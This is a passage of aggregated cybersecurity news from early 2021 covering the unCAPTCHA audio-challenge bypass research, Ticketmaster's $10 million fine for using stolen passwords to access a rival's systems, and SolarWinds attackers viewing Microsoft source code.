Google responded with improved browser automation detection and the use of spoken phrases instead of numbers, according to the researchers’ GitHub reports. But by June 2018 researchers found the latest reCAPTCHA was easier to trick that its predecessor.
“Thanks to the changes to the audio challenge, passing reCAPTCHA is easier than ever before. The code now only needs to make a single request to a free, publicly available speech to text API to achieve around 90 percent accuracy over all CAPTCHAs,” according to the GitHub findings from the University of Maryland team.
They explained that reCAPTCHA was designed to block Selenium browser automation engines, while, “unCAPTCHA2 uses a screen clicker to move to certain pixels on the screen and move around the page like a human,” the researchers continued. “There is certainly work to be done here — the coordinates need to be updated for each new user and is not the most robust.”
The report added that the reCAPTCHA bug was reported to Google in June 2018, and they okayed the release of the unCAPTCHA2 code.
“UnCAPTCHA2, like the original version, is meant to be a PoC,” the report’s disclaimer said. “As Google updates its service, this repository will not be updated. As a result, it is not expected to work in the future, and is likely to break at any time.”
Now Tschacher appears to have come up with what could be called unCAPTCHA3, except now he said he can achieve a 97 percent success rate, instead of the original 85 percent reported in 2017.
Is CAPTCHA Secure?
“There has always been a game of cat-and-mouse between barriers like CAPTCHA and reCAPTCHA, and workarounds that attackers seeking automation employ,” Oliver Tavakoli, Vectra CTO, told Threatpost. “This is a clever approach in that it uses an alternate scheme made available for visually impaired people to de-fang reCAPTCHA – and using Google’s own speech-to-text API adds a bit of irony to the workaround. Hard to see how to supply support for the visually impaired without making reCAPTCHA a lot more easy to game.”
But according to Dirk Schrader, global vice president with New Net Technoloiges, there isn’t a ready replacement for widespread replacement of CAPTCHAs and that even if there was an easy swap to be made, the reality is that no single technology can replace good cybersecurity controls.
“This research could also be titled ‘Machines tricking Machines.'” Schrader said. “It’s proof that no technology, and no application, is safe forever and the need for security of systems is based on core controls like change control and vulnerability management is reconfirmed.”
He added that CAPTCHA has been a reliable tool in separating machines from humans and might just need a bit of tweaking to keep up.
“The fact that one Google ‘machine’ is used against the other just adds the fun factor to the story,” Schrader said. “CAPTCHA has long been seen as a pain, however so far has proven to be a fairly good instrument to distinct human from machine interaction.”
Ticketmaster Coughs Up $10 Million Fine After Hacking Rival Business
5.1.2021 Hacking Threatpost
Several Ticketmaster executives conspired a hack against a rival concert presales firm, in attempt to ‘choke off’ its business.
Ticketmaster must pay a hefty $10 million fine after several employees utilized unlawfully obtained passwords to hack a rival company’s computer systems – in attempts to “choke off” its business.
The American ticket sales and distribution giant, which is owned by Live Nation, in 2013 hired an employee who formerly worked for Ticketmaster’s rival company (reported by some outlets to be Songkick, a now-defunct company that offered concert pre-sale tickets), according to the Department of Justice (DoJ) last week.
This co-conspirator illegally retained credentials from the rival firm, which he and other Ticketmaster executives then used to hack into the victim company’s systems. From there, they were able to monitor the company’s draft ticketing web pages, allowing them to find out which artists planned to use the rival company to sell tickets. They were also able to hack into and snoop on the company’s Artist Toolbox, a password-protected app that provides real-time data about ticket sales.
2020 Reader Survey: Share Your Feedback to Help Us Improve
“When employees walk out of one company and into another, it’s illegal for them to take proprietary information with them,” said FBI Assistant Director-in-Charge Sweeney in a statement. “Ticketmaster used stolen information to gain an advantage over its competition, and then promoted the employees who broke the law. This investigation is a perfect example of why these laws exist — to protect consumers from being cheated in what should be a fair market place.”
The Hack
According to court documents, the former senior employee (who as of now remains unnamed) of the victim company worked there between May 2010 to July 2012. In 2012, he signed a separation agreement with the victim company upon leaving, in which he agreed to maintain the confidentiality of that company’s sensitive data, before joining Live Nation in August 2013.
In 2013, this former employee shared with former Ticketmaster head of the Artist Services division Zeeshan Zaidi the URLs for draft ticketing web pages of the victim company, which were not public.
“In response to a Ticketmaster executive explaining that the goal was to ‘choke off [victim company]’ and ‘steal back one of [the victim company]’s signature clients,’ co-conspirator 1 offered that Ticketmaster could ‘cut [victim company] off at the knees’ if they could win back presale ticketing business for a second major artist that was a client of the victim company,” according to the DoJ.
Then, the former employee sent Zaidi and another Ticketmaster executive multiple sets of usernames and passwords for the victim company’s password-protected Artist Toolbox app, and encouraged them to “screen-grab the hell out of the system.” The co-conspirators even went so far as to use the passwords to access the app in a live demo at a Ticketmaster internal summit, in front of at least 14 other Ticketmaster and Live Nation employees, according to the DoJ.
The former employee in 2015 was promoted and given a raise; meanwhile, Ticketmaster employees continued to access the Artist Toolbox app through December 2015.
Next Steps
In 2015, the victim company filed a civil complaint against Live Nation and Ticketmaster alleging antitrust violations. That lawsuit was amended in 2017 to add allegations that Ticketmaster had accessed the company’s computer systems without authorization. In 2017, both the former employee and Zaidu were then terminated by Ticketmaster.
Last week’s fine against Ticketmaster resolves charges that the company “repeatedly accessed without authorization the competitor’s computer systems.” The fine is part of a deferred prosecution agreement that Ticketmaster entered with the U.S. Attorney’s Office for the Eastern District of New York to resolve a five-count criminal complaint filed today charging computer intrusion and fraud offenses. As part of the charges, on Oct. 18, 2019, Zaidi pled guilty in a related case to conspiring to commit computer intrusions and wire fraud based on his participation in this scheme.
This is also not the first time Ticketmaster has found itself up against a hefty fine for cybersecurity-related issues. In November, Ticketmaster’s U.K. division was slapped with a $1.65 million fine by the Information Commissioner’s Office (ICO) in the UK, over its 2018 data breach that impacted 9.4 million customers.
The incident points to employee insider threats facing many companies – an issue that is particularly worrying today as many may feel stressed or disillusioned by their workplace during today’s shaky, COVID-19-disrupted economy. One specific concern for companies reflected by this particular case is illegal employee data retention after leaving a firm. For instance, last year a former Cisco employee was sentenced to two years in jail after he hacked into Cisco’s Webex collaboration platform – after leaving the firm.
Threatpost has reached out to Ticketmaster for further comment and has not heard back before publication.
Over 250 Organizations Breached via SolarWinds Supply Chain Hack: Report
5.1.2021 Hacking Securityweek
It is believed that the recently disclosed attack targeting Texas-based IT management solutions provider SolarWinds resulted in threat actors gaining access to the networks of more than 250 organizations, according to reports.
The New York Times reported over the weekend that the SolarWinds supply chain attack is believed to have impacted as many as 250 government agencies and businesses.
It was previously revealed that the list of victims included major tech companies such as Microsoft, Cisco and VMware, and U.S. government agencies such as the State Department, Commerce Department, Treasury, DHS, and the National Institutes of Health.
Microsoft admitted recently that the attackers gained access to some of its source code, but the company claimed they couldn’t have made any modifications to the code.
The New York Times also learned that some SolarWinds software is maintained in Eastern Europe and investigators in the U.S. are now trying to determine if the breach originated there.
This link to Eastern Europe has raised some concerns considering that many believe the attack was conducted by hackers connected to Russian intelligence.
In the meantime, SolarWinds continues to share updates regarding its investigation into the incident. The supply chain attack involved the use of trojanized updates for the company’s Orion monitoring product in an effort to deliver, among other things, a piece of malware named SUNBURST.
However, investigations revealed the existence of a different piece of malware, named SUPERNOVA, that may have been used by a different threat actor as part of an operation that may not be related to the supply chain attack.
SolarWinds and others are trying to determine if SUPERNOVA, whose delivery involved exploitation of a zero-day vulnerability, is connected to SUNBURST. In its latest update, the company said it does “not have a definitive answer at this time” regarding SUNBURST and SUPERNOVA possibly being related.
On December 18, shortly after the SolarWinds breach came to light, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive instructing federal agencies to immediately take steps to detect, investigate and respond to potential intrusions. On December 30, CISA issued supplemental guidance to help government organizations mitigate the threat.
Ticketmaster will pay $10 Million fine over hacking a competitor
3.1.2021 Hacking Securityaffairs
Ticketmaster agreed to pay a $10 million fine for hacking into the computer system of the startup rival CrowdSurge.
The news is disturbing, Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing computer systems into the computer system of the startup rival CrowdSurge. The intrusions into the competitor’s systems took place repeatedly between 2013 and 2015.
A Ticketmaster executive explained that the goal was to “choke off [victim company]” and “steal back one of [victim company]’s signature clients,”
The attacks aimed at stealing information to gain an advantage over CrowdSurge, which was acquired by Warner Music Group (WMG) in 2017.
“Ticketmaster Used Passwords Unlawfully Retained by a Former Employee of a Competitor to Access Computer Systems in Scheme to “Choke Off” the Victim’s Business” wrote the DoJ.
According to the investigators, the company used stolen passwords to unlawfully collect business intelligence.
“Ticketmaster employees repeatedly – and illegally – accessed a competitor’s computers without authorization using stolen passwords to unlawfully collect business intelligence,” stated Acting U.S. Attorney DuCharme. “Further, Ticketmaster’s employees brazenly held a division-wide ‘summit’ at which the stolen passwords were used to access the victim company’s computers, as if that were an appropriate business tactic. Today’s resolution demonstrates that any company that obtains a competitor’s confidential information for commercial advantage, without authority or permission, should expect to be held accountable in federal court.”
In 2017, CrowdSurge sued Live Nation for antitrust violations, it accused Ticketmaster of illegally access to confidential business documents, including client lists, contracts, and credentials of victim’s tools.
Ticketmaster hired a former employee of CrowdSurge, Stephen Mead, to gain access to the systems of the rival company.
Mead was CrowdSurge’s general manager of U.S. operations, he provided Zeeshan Zaidi, the former head of Ticketmaster’s artist services division, and another Ticketmaster employee the passwords to Artist Toolbox, which is an app that allows victim’s customers to view real-time data about the sale of sold tickets.
“In early May 2014, a senior executive of Live Nation (Corporate Officer-1) asked Zaidi and others how Ticketmaster’s presale online offering compared with the Toolbox. Coconspirator-1 was then asked to “do a screenshare/demo” at an upcoming “Artist Services Summit.” Coconspirator-1 agreed to “pull together a list of the log-ins and URL’s that I still have access to for this so I can give the team as much insight as possible.” At least 14 Live Nation and Ticketmaster employees attended the Artist Services Summit, in San Francisco.” continues the DoJ. “There, in front of those employees, Coconspirator-1 used a username and password he had retained from his employment at the victim company to log in to a Toolbox, and provided a demonstration. Coconspirator-1 later also provided Zaidi and other Ticketmaster executives with internal and confidential financial documents he had retained from his employment at the victim company.”
Both Mead and Zaidi were fired by Ticketmaster in 2017.
On October 18, 2019, Zaidi pled guilty for his participation in the hacking activity.
Ticketmaster already paid $110 million in 2018 to settle a civil suit brought by Songkick, which merged with CrowdSurge in 2015
Ticketmaster will pay a criminal penalty of $10 million and will maintain a compliance and ethics program to prevent and detect violations of the Computer Fraud and Abuse Act and other applicable laws. has to prevent the unauthorized and unlawful acquisition of confidential information belonging to its competitors.
Ticketmaster will also report to the US Attorney’s Office annually over the three-year term of the agreement regarding these compliance measures.
Ticketmaster To Pay $10 Million Fine For Hacking A Rival Company
3.1.2021 Hacking Thehackernews
Ticketmaster has agreed to pay a $10 million fine after being charged with illegally accessing computer systems of a competitor repeatedly between 2013 and 2015 in an attempt to "cut [the company] off at the knees."
A subsidiary of Live Nation, the California-based ticket sales and distribution company used the stolen information to gain an advantage over CrowdSurge — which merged with Songkick in 2015 and later acquired by Warner Music Group (WMG) in 2017 — by hiring a former employee to break into its tools and gain insight into the firm's operations.
"Ticketmaster employees repeatedly – and illegally – accessed a competitor's computers without authorization using stolen passwords to unlawfully collect business intelligence," said Acting U.S. Attorney Seth DuCharme.
"Further, Ticketmaster's employees brazenly held a division-wide 'summit' at which the stolen passwords were used to access the victim company's computers, as if that were an appropriate business tactic."
The allegations were first reported in 2017 after CrowdSurge sued Live Nation for antitrust violations, accusing Ticketmaster of accessing confidential business plans, contracts, client lists, and credentials of CrowdSurge tools.
According to court documents released on December 30, after being hired by Live Nation in 2013, Stephen Mead, who was CrowdSurge's general manager of U.S. operations, shared with Zeeshan Zaidi, the former head of Ticketmaster's artist services division, and another Ticketmaster employee the passwords to Artist Toolbox, an app that provided real-time data about tickets sold through the victim company.
Besides password theft, Mead is also accused of providing "internal and confidential financial documents" retained from his former employer, as well as URLs for draft ticketing web pages so as to learn which artists planned to use CrowdSurge to sell tickets and "dissuade" them from doing so.
On October 18, 2019, Zaidi pled guilty in a related case to conspiring to commit computer intrusions and wire fraud for his participation in the scheme, stating, "we're not supposed to tip anyone off that we have this view into [the victim company's] activities."
An unnamed Ticketmaster executive said in an internal email the goal was to "choke off" and "steal" its signature clients by winning back the presale ticketing business for a second major artist that was a client of CrowdSurge.
Both Mead and Zaidi are no longer employed by Ticketmaster.
Ticketmaster previously settled a lawsuit brought by Songkick in 2018 by agreeing to pay the company's owners $110 million and acquire its remaining intellectual property not sold to WMG for an undisclosed amount.
Besides paying the $10 million penalties, Ticketmaster is expected to maintain a compliance and ethics program to detect and prevent such unauthorized acquisition of confidential information belonging to its rivals.
The company will also be required to make an annual report to the U.S. Attorney's Office over the next three years to ensure compliance.
SolarWinds hackers gained access to Microsoft source code
1.1.2021 Hacking Securityaffairs
The threat actors behind the SolarWinds supply chain attack could have had access to the source code of several Microsoft products.
The threat actors behind the SolarWinds attack could have compromised a small number of internal accounts and used at least one of them to view source code in a number of source code repositories.
Shortly after the disclosure of the SolarWinds attack, Microsoft confirmed that it was one of the companies breached in the recent supply chain attack, but the IT giant denied that the nation-state actors compromised its software supply-chain to infect its customers.
Frank Shaw, the corporate vice president of communications at Microsoft, confirmed that its company detected multiple malicious SolarWinds binaries in its environment.
A Microsoft internal Solorigate investigation update published today revealed that the company has found no evidence that the attack has impacted the production services or customer data.
Microsoft also added that forged SAML tokens were not used to compromise its corporate domains.
“We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories.” reads the post published by Microsoft.”The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated.”
The IT giant pointed out that the account compromised by the threat actors did not have the permissions to modify any source code or engineering systems.
Microsoft plans to provide additional updates if and when its experts will discover new information to support the community.
“At Microsoft, we have an inner source approach – the use of open source software development best practices and an open source-like culture – to making source code viewable within Microsoft. This means we do not rely on the secrecy of source code for the security of products, and our threat models assume that attackers have knowledge of source code. So viewing source code isn’t tied to elevation of risk.” concludes Microsoft.
“As with many companies, we plan our security with an “assume breach” philosophy and layer in defense-in-depth protections and controls to stop attackers sooner when they do gain access.”
Microsoft Says 'SolarWinds' Hackers Viewed Internal Code
1.1.2021 Hacking Securityweek
Microsoft acknowledged Thursday that attackers who spearheaded a massive hack of government and private computer networks gained access to its internal "source code," a key building block for its software.
But the US tech giant said the attack, which top US officials have attributed to Russian-led hackers, were unable to compromise or modify any of its software.
The news shows an even broader attack vector for the breach of security software made by the US company SolarWinds. It is also believed to have given the hackers access to the systems operated by the US Treasury, Energy and Homeland Security Departments and a wide array of other victims in government and the private sector.
Microsoft had previously noted "malicious SolarWinds applications" in its systems. In an update on its internal investigation, the company said the hackers got deeper into its systems than previously believed.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," Microsoft said on its security blog.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated"
Microsoft maintained that the latest revelation "has not put at risk the security of our services or any customer data, but we want to be transparent and share what we're learning as we combat what we believe is a very sophisticated nation-state actor."
Both US Attorney General Bill Barr and Secretary of State Mike Pompeo have attributed the attack to a Russian-led effort, while President Donald Trump has declined to point the finger at Moscow.
The Cybersecurity and Infrastructure Security Agency (CISA) said US government agencies, critical infrastructure entities and private sector organizations had been exposed in the months-long cyberattack.
Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code
1.1.2021 Hacking Thehackernews
Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network.
The "very sophisticated nation-state actor" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker disclosed in an update.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated."
The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attackers had compromised its systems via a trojanized SolarWinds update to steal its Red Team penetration testing tools.
During the course of the probe into the hack, Microsoft had previously admitted to detecting malicious SolarWinds binaries in its own environment but denied its systems were used to target others or that attackers had access to production services or customer data.
Several other companies, including Cisco, VMware, Intel, NVIDIA, and a number of other US government agencies, have since discovered markers of the Sunburst (or Solorigate) malware on their networks, planted via tainted Orion updates.
The Redmond-based company said its investigation is still ongoing but downplayed the incident, adding "viewing source code isn't tied to elevation of risk" and that it had found evidence of attempted activities that were neutralized by its protections.
In a separate analysis published by Microsoft on December 28, the company called the attack a "cross-domain compromise" that allowed the adversary to introduce malicious code into signed SolarWinds Orion Platform binaries and leverage this widespread foothold to continue operating undetected and access the target's cloud resources, culminating in the exfiltration of sensitive data.
SolarWinds' Orion software, however, wasn't the only initial infection vector, as the US Cybersecurity and Infrastructure Security Agency (CISA) said the attackers used other methods as well, which have not yet been publicly disclosed.
The agency also released supplemental guidance urging all US federal agencies that still run SolarWinds Orion software to update to the latest 2020.2.1 HF2 version.
"The National Security Agency (NSA) has examined this version and verified that it eliminates the previously identified malicious code," the agency said.